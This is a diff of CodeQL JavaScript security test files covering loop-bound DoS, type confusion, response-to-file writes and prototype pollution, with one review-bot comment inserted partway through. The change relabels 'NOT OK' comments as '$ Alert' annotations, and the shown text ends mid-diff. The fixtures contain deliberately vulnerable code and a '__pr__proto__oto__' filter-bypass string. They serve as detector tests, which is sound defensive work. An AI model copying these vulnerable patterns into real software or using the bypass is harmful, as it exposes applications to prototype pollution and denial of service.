@@ -16,18 +16,18 @@ // CVE-2020-7656 (function(responseText) { var rscript = /)<[^<]*)*<\/script>/gi; - responseText.replace(rscript, ""); // NOT OK + responseText.replace(rscript, ""); // $ Alert return responseText; }); // CVE-2019-1010091 (function(text) { - text = text.replace(//gm, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/g, ""); // NOT OK (ng-attributes) + x = x.replace(//gm, ""); // $ Alert + x = x.replace(/\sng-[a-z-]+/, ""); // $ Alert + x = x.replace(/\sng-[a-z-]+/g, ""); // $ Alert - ng-attributes - x = x.replace(/()/g, "\n"); // OK: not a sanitizer + x = x.replace(/()/g, "\n"); // OK - not a sanitizer - x = x.replace(//g, ""); // OK [INCONSISTENCY] - x = x.replace(/> - > - - + > + > + > + + - - - + + + - + - - + \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js index bca6567b4f5e..324197179d2f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js @@ -17,7 +17,7 @@ rootRoute.post(function(req, res) { function problem(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert ret.push(val[i]); } } @@ -26,7 +26,7 @@ function whileLoop(val) { var ret = []; var i = 0; - while (i < val.length) { // NOT OK! + while (i < val.length) { // $ Alert ret.push(val[i]); i++; } @@ -35,7 +35,7 @@ function whileLoop(val) { function useLengthIndirectly(val) { var ret = []; - var len = val.length; // NOT OK! + var len = val.length; // $ Alert for (var i = 0; i < len; i++) { ret.push(val[i]); 
@@ -48,7 +48,7 @@ function noNullPointer(val) { const c = 0; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert // Constantly accessing element 0, therefore not guaranteed null-pointer. ret.push(val[c].foo); diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js index 3193a384aca2..923416c35b8e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js @@ -17,7 +17,7 @@ rootRoute.post(function (req, res) { function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert for (var k = 0; k < 2; k++) { if (k == 3) { // Does not prevent DoS, because this is inside an inner loop. @@ -31,7 +31,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { try { throw 2; // Is caught, and therefore the DoS is not prevented. @@ -46,7 +46,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { (function (i) { return i+2; // Does not prevent DoS. @@ -57,7 +57,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // NOT OK! + _.map(val, function (e) { // $ Alert if (!e) { try { throw new Error(); // Does not prevent DoS. diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js index 705ec6b5b0ea..71586956dad2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js @@ -17,7 +17,7 @@ rootRoute.post(function (req, res) { function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { break; // Prevents DoS. } @@ -28,7 +28,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { throw 2; // Prevents DoS. } @@ -40,7 +40,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { return 2; // Prevents DoS. } @@ -49,7 +49,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // OK + _.map(val, function (e) { if (!e) { throw new Error(); // Prevents DoS. } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js index 49c813834450..ddd0dcf3301d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js @@ -23,7 +23,7 @@ function sanitized(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -35,7 +35,7 @@ function sanitized2(val) { return []; } // Val can only be a primitive. Therefore no issue! - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } 
@@ -53,7 +53,7 @@ function sanitized3(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -67,7 +67,7 @@ function sanitized4(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js index 2f2fdb0d67a0..548d0fc944a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js @@ -10,5 +10,5 @@ rootRoute.post(function(req, res) { }); function problem(val) { - _.chunk(val, 2); // NOT OK! + _.chunk(val, 2); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js index 22649392557e..a9817883f082 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js @@ -16,7 +16,7 @@ function problem(val) { return []; } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js index b8e4b1f50971..bd3aed633ff5 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js @@ -21,7 +21,7 @@ rootRoute.post(function(req, res) { function nullPointer(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo + 42); } } @@ -30,7 +30,7 @@ function nullPointer(val) { function nullPointer2(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { var element = val[i]; ret.push(element.foo + 42); } @@ -38,7 +38,7 @@ function nullPointer2(val) { function nullPointer3(val) { let arr = val.messaging - for (let i = 0; i < arr.length; i++) { // OK + for (let i = 0; i < arr.length; i++) { let event = val.messaging[i] let sender = event.sender.id } @@ -46,13 +46,13 @@ function nullPointer3(val) { function lodashPointer(val) { - return _.map(val, function(e) { // OK + return _.map(val, function(e) { return e.foo; }) } function lodashArrowFunc(val) { - return _.map(val, (e) => { // OK + return _.map(val, (e) => { return e.foo; }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js index bbbe3a9eb7ee..ac456fbdbd94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js 
@@ -14,11 +14,11 @@ function nullPointer(val) { var ret = []; // Has obvious null-pointer. And guards the next loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo); } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index 3f5840b9f080..d859f2ade6e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js 
@@ -3,59 +3,59 @@ var Koa = require('koa'); express().get('/some/path', function (req, res) { var foo = req.query.foo; - foo.indexOf(); // NOT OK + foo.indexOf(); // $ Alert - foo.concat(); // NOT OK + foo.concat(); // $ Alert function f() { - foo.concat(); // NOT OK + foo.concat(); // $ Alert } function g(bar) { - bar.concat(); // NOT OK + bar.concat(); // $ Alert } g(foo); - req.url.indexOf(); // OK + req.url.indexOf(); - foo.indexOf(prefix) === 0; // OK - foo.indexOf(prefix) == 0; // OK - foo.indexOf(prefix) !== 0; // OK + foo.indexOf(prefix) === 0; + foo.indexOf(prefix) == 0; + foo.indexOf(prefix) !== 0; - foo.slice(-1) === 'x'; // OK + foo.slice(-1) === 'x'; - foo.indexOf(prefix) == 1; // NOT OK - foo.slice(1) === 'x'; // NOT OK + foo.indexOf(prefix) == 1; // $ Alert + foo.slice(1) === 'x'; // $ Alert if (typeof foo === "string") { - foo.indexOf(); // OK + foo.indexOf(); } else { - foo.indexOf(); // OK + foo.indexOf(); } if (foo instanceof Array) { - foo.indexOf(); // OK, but still flagged [INCONSISTENCY] + foo.indexOf(); // $ SPURIOUS: Alert } - (foo + f()).indexOf(); // OK + (foo + f()).indexOf(); - foo.length; // NOT OK + foo.length; // $ Alert }); new Koa().use(function handler(ctx) { var foo = ctx.request.query.foo; - foo.indexOf(); // NOT OK + foo.indexOf(); // $ Alert }); express().get('/some/path/:foo', function (req, res) { var foo = req.params.foo; - foo.indexOf(); // OK + foo.indexOf(); }); express().get('/some/path/:foo', function (req, res) { - if (req.query.path.length) { } // OK - req.query.path.length == 0; // OK - !req.query.path.length; // OK - req.query.path.length > 0; // OK + if (req.query.path.length) { } + req.query.path.length == 0; + !req.query.path.length; + req.query.path.length > 0; }); express().get('/some/path/:foo', function (req, res) { 
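Review bot: The `$ SPURIOUS: Alert` annotation inside the `foo instanceof Array` branch drops the rationale the old comment gave for this being a known false positive, presumably that the `instanceof Array` guard should rule out the string/array confusion. Keeping it, e.g. `foo.indexOf(); // $ SPURIOUS: Alert - instanceof Array guard not recognised`, tells the next reader what would have to change for the expectation to go away, the way `// MISSING: Alert - not tracking the expansion string` elsewhere in this patch keeps its reason.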
@@ -65,11 +65,11 @@ express().get('/some/path/:foo', function (req, res) { return; } - while (p.length) { // OK + while (p.length) { p = p.substr(1); } - p.length < 1; // OK + p.length < 1; }); express().get('/some/path/:foo', function (req, res) { @@ -78,8 +78,8 @@ express().get('/some/path/:foo', function (req, res) { }); function safeGet(obj, p) { - if (p === '__proto__' || // NOT OK - could be singleton array - p === 'constructor') { // NOT OK - could be singleton array + if (p === '__proto__' || // $ Alert - could be singleton array + p === 'constructor') { // $ Alert - could be singleton array return null; } return obj[p]; @@ -87,24 +87,24 @@ function safeGet(obj, p) { express().get('/foo', function (req, res) { let data = req.query; - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } if (typeof data.foo !== 'string') { - data.foo.indexOf(); // OK + data.foo.indexOf(); } if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } }); express().get('/foo', function (req, res) { let data = req.query.data; - data.indexOf(); // NOT OK + data.indexOf(); // $ Alert if (Array.isArray(data)) { - data.indexOf(); // OK + data.indexOf(); } else { - data.indexOf(); // OK + data.indexOf(); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-912/tst.js b/javascript/ql/test/query-tests/Security/CWE-912/tst.js index 78acef7d3aad..88e7827a480c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/tst.js 
@@ -13,27 +13,27 @@ try { (response) => { response.setEncoding('utf8'); response.on('data', (c) => { - fs.writeFile("/tmp/test", c, (err) => {}); // BAD: data from response 'on' event flows to file + fs.writeFile("/tmp/test", c, (err) => {}); // $ Alert - data from response 'on' event flows to file let writeStream = fs.createWriteStream('/usr/evil/evil.cmd'); - writeStream.write(c); // BAD: data from response 'on' event flows to filestream write + writeStream.write(c); // $ Alert - data from response 'on' event flows to filestream write writeStream.end(); var stream = fs.createWriteStream("my_file.txt"); stream.once('open', function (fd) { - stream.write(c); // BAD: data from response 'on' event flows to filestream write + stream.write(c); // $ Alert - data from response 'on' event flows to filestream write stream.end(); }); }); response.on('error', () => { - fs.writeFile("/tmp/test", "error occured"); // GOOD: static data written to file + fs.writeFile("/tmp/test", "error occured"); // OK - static data written to file }); }).on('error', () => { let error = "error occured"; let writeStream = fs.createWriteStream('/usr/good/errorlog.txt'); - writeStream.write(error); // GOOD: static data written to file stream + writeStream.write(error); // OK - static data written to file stream writeStream.end(); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js index fb550533d124..6acf7ef2df10 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js @@ -3,7 +3,7 @@ module.exports.set = function recSet(obj, path, value) { var currentValue = obj[currentPath]; if (path.length === 1) { if (currentValue === void 0) { - obj[currentPath] = value; // NOT OK + obj[currentPath] = value; // $ Alert } return currentValue; } 
@@ -12,18 +12,18 @@ module.exports.set = function recSet(obj, path, value) {
 }
 module.exports.set2 = function (obj, path, value) {
- obj[path[0]][path[1]] = value; // NOT OK
+ obj[path[0]][path[1]] = value; // $ Alert
 }
 module.exports.setWithArgs = function() {
 var obj = arguments[0];
 var path = arguments[1];
 var value = arguments[2];
- obj[path[0]][path[1]] = value; // NOT OK
+ obj[path[0]][path[1]] = value; // $ Alert
 }
 module.exports.usedInTest = function (obj, path, value) {
- return obj[path[0]][path[1]] = value; // NOT OK
+ return obj[path[0]][path[1]] = value; // $ Alert
 }
 module.exports.setWithArgs2 = function() {
@@ -31,7 +31,7 @@ module.exports.setWithArgs2 = function() {
 var obj = args[0];
 var path = args[1];
 var value = args[2];
- obj[path[0]][path[1]] = value; // NOT OK
+ obj[path[0]][path[1]] = value; // $ Alert
 }
 module.exports.setWithArgs3 = function() {
@@ -39,7 +39,7 @@ module.exports.setWithArgs3 = function() {
 var obj = args[0];
 var path = args[1];
 var value = args[2];
- obj[path[0]][path[1]] = value; // NOT OK
+ obj[path[0]][path[1]] = value; // $ Alert
 }
 function id(s) {
@@ -52,7 +52,7 @@ module.exports.notVulnerable = function () {
 const path = id("x");
 const value = id("y");
 const obj = id("z");
- return (obj[path[0]][path[1]] = value); // OK
+ return (obj[path[0]][path[1]] = value);
 }
 class Foo {
@@ -67,12 +67,12 @@ class Foo {
 const obj = this.obj;
 const path = this.path;
 const value = this.value;
- return (obj[path[0]][path[1]] = value); // NOT OK
+ return (obj[path[0]][path[1]] = value); // $ Alert
 }
 safe() {
 const obj = this.obj;
- obj[path[0]] = this.value; // OK
+ obj[path[0]] = this.value;
 }
 }
@@ -81,10 +81,10 @@ module.exports.Foo = Foo; module.exports.delete = function() { var obj = arguments[0]; var path = arguments[1]; - delete obj[path[0]]; // OK + delete obj[path[0]]; var prop = arguments[2]; var proto = obj[path[0]]; - delete proto[prop]; // NOT OK + delete proto[prop]; // $ Alert } module.exports.fixedProp = function (obj, path, value) { @@ -105,18 +105,18 @@ module.exports.sanWithFcuntion = function() { var two = arguments[2]; var value = arguments[3]; - obj[one][two] = value; // NOT OK + obj[one][two] = value; // $ Alert if (isPossibilityOfPrototypePollution(one) || isPossibilityOfPrototypePollution(two)) { throw new Error('Prototype pollution is not allowed'); } - obj[one][two] = value; // OK + obj[one][two] = value; } module.exports.returnsObj = function () { return { set: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } } } @@ -125,7 +125,7 @@ class MyClass { constructor() {} set(obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } static staticSet(obj, path, value) { diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js index d74de12493aa..f8ed4b8235ab 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js @@ -1,3 +1,3 @@ module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js index 4d3e7a82f5c8..e15bbf81cddd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js @@ -3,7 +3,7 @@ Foobar.prototype = { method: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert }, }; diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js index 66db628cfcc0..1a662007b49a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js @@ -1,5 +1,5 @@ module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } var other = require('./other') diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js index a622a8913905..770df9ab2cf1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js 
@@ -5,50 +5,50 @@ app.get('/', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK - object[taint].foo = 'bar'; // NOT OK - may pollute, although attacker has no control over data being injected - object.baz[taint] = taint; // OK + object[taint][taint] = taint; // $ Alert + object[taint].foo = 'bar'; // $ Alert - may pollute, although attacker has no control over data being injected + object.baz[taint] = taint; mutateObject(object[taint], 'blah'); - unsafeGetProp(object, taint).foo = 'bar'; // NOT OK - unsafeGetProp(object, 'safe').foo = 'bar'; // OK + unsafeGetProp(object, taint).foo = 'bar'; // $ Alert + unsafeGetProp(object, 'safe').foo = 'bar'; - safeGetProp(object, taint).foo = 'bar'; // OK + safeGetProp(object, taint).foo = 'bar'; let possiblyProto = object[taint] || new Box(); possiblyProto.m(); let prototypeLessObject = Object.create(null); - prototypeLessObject[taint][taint] = taint; // OK + prototypeLessObject[taint][taint] = taint; let directlyMutated = {}; directlyMutated[taint] = taint; // OK - can't affect Object.prototype if (object.hasOwnProperty(taint)) { - object[taint].foo = 'bar'; // OK + object[taint].foo = 'bar'; } }); function mutateObject(obj, x) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert if (obj instanceof Object) { - obj.foo = x; // OK + obj.foo = x; } if (obj != null) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'function') { - obj.foo = x; // OK + obj.foo = x; } if (typeof obj !== 'function') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'object') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj !== 'object') { - obj.foo = x; // OK + obj.foo = x; } } 
@@ -77,39 +77,39 @@ app.get('/', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert - object["" + taint]["" + taint] = taint; // NOT OK + object["" + taint]["" + taint] = taint; // $ Alert if (!taint.includes("__proto__")) { - object[taint][taint] = taint; // OK + object[taint][taint] = taint; } else { - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert } }); app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace('_', '-')].x = 'foo'; // OK - obj[req.query.x.replace('_', '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(/_/g, '')].x = 'foo'; // OK - obj[req.query.x.replace(/_/g, '-')].x = 'foo'; // OK - obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // NOT OK - "__pr__proto__oto__" - obj[req.query.x.replace('o', '0')].x = 'foo'; // OK + obj[req.query.x.replace('_', '-')].x = 'foo'; + obj[req.query.x.replace('_', '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(/_/g, '')].x = 'foo'; + obj[req.query.x.replace(/_/g, '-')].x = 'foo'; + obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // $ Alert - "__pr__proto__oto__" + obj[req.query.x.replace('o', '0')].x = 'foo'; }); app.get('/bar', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert const bad = ["__proto__", "constructor"]; if (bad.includes(taint)) { return; } - object[taint][taint] = taint; // OK + object[taint][taint] = taint; }); app.get('/assign', (req, res) => { 
@@ -126,7 +126,7 @@ app.get('/assign', (req, res) => { app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; // OK - obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; // OK + obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; + obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js index c7285a3ac1bd..c53d6f20aca1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js @@ -12,7 +12,7 @@ function assignToPath(target, path, value) { } target = target[key]; } else { - target[key] = value; // NOT OK + target[key] = value; // $ Alert } } } @@ -28,7 +28,7 @@ function assignToPathSafe(target, path, value) { } target = target[key]; } else { - target[key] = value; // OK + target[key] = value; } } } @@ -41,7 +41,7 @@ function assignToPathAfterLoop(target, path, value) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function splitHelper(path, sep) { @@ -58,7 +58,7 @@ function assignToPathWithHelper(target, path, value, sep) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function spltOnRegexp(target, path, value) { 
@@ -68,5 +68,5 @@ function spltOnRegexp(target, path, value) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js index 14a0a19fb626..ad420927a5c4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js @@ -5,7 +5,7 @@ function copyUsingForIn(dst, src) { if (dst[key]) { copyUsingForIn(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -15,7 +15,7 @@ function copyUsingKeys(dst, src) { if (dst[key]) { copyUsingKeys(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } @@ -33,7 +33,7 @@ function copyRestAux(dst, value, key) { if (dstValue) { copyRest(dstValue, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } @@ -43,7 +43,7 @@ function copyProtoGuarded(dst, src) { if (dst[key]) { copyProtoGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -54,7 +54,7 @@ function copyCtorGuarded(dst, src) { if (dst[key]) { copyCtorGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -65,7 +65,7 @@ function copyDoubleGuarded(dst, src) { if (dst[key]) { copyDoubleGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -80,7 +80,7 @@ function copyComplex(dst, src) { if (dst[key]) { copyComplex(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } 
@@ -93,7 +93,7 @@ function copyHasOwnProperty(dst, src) { if (dst.hasOwnProperty(key)) { copyHasOwnProperty(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -106,7 +106,7 @@ function copyHasOwnPropertyBad(dst, src) { if (dst[key]) { copyHasOwnPropertyBad(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -118,21 +118,21 @@ function copyHasOwnPropertyTearOff(dst, src) { if (_hasOwnProp.call(dst, key)) { copyHasOwnPropertyTearOff(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } function shallowExtend(dst, src) { for (let key in src) { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } function transform(src, fn) { if (typeof src !== 'object') return fn(src); for (let key in src) { - src[key] = transform(src[key], fn); // OK + src[key] = transform(src[key], fn); } return src; } @@ -141,7 +141,7 @@ function clone(src) { if (typeof src !== 'object') return src; let result = {}; for (let key in src) { - result[key] = clone(src[key]); // OK + result[key] = clone(src[key]); } return result; } @@ -151,7 +151,7 @@ function higherOrderRecursion(dst, src, callback) { if (dst[key]) { callback(dst, src, key); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -168,7 +168,7 @@ function instanceofObjectGuard(dst, src) { if (typeof dstValue === 'object' && dstValue instanceof Object) { instanceofObjectGuard(dstValue, src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -181,7 +181,7 @@ function copyWithBlacklist(dst, src) { if (dst[key]) { copyWithBlacklist(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -193,7 +193,7 @@ function copyUsingPlainForLoop(dst, src) { if (dst[key]) { copyUsingPlainForLoop(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } 
@@ -205,7 +205,7 @@ function copyUsingPlainForLoopNoAlias(dst, src) { if (dst[key]) { copyUsingPlainForLoopNoAlias(dst[keys[i]], src[keys[i]]); } else { - dst[keys[i]] = src[keys[i]]; // NOT OK - but not flagged + dst[keys[i]] = src[keys[i]]; // $ MISSING: Alert } } } @@ -214,7 +214,7 @@ function deepSet(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // OK + map[key1][key2] = value; } function deepSetCaller(data) { @@ -230,7 +230,7 @@ function deepSetBad(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // NOT OK - object literal can flow here + map[key1][key2] = value; // $ Alert - object literal can flow here } function deepSetCallerBad(data) { @@ -254,7 +254,7 @@ function mergeWithCopy(dst, src) { let result = maybeCopy(dst); for (let key in src) { if (src.hasOwnProperty(key)) { - result[key] = mergeWithCopy(dst[key], src[key]); // OK + result[key] = mergeWithCopy(dst[key], src[key]); } } return result; @@ -267,7 +267,7 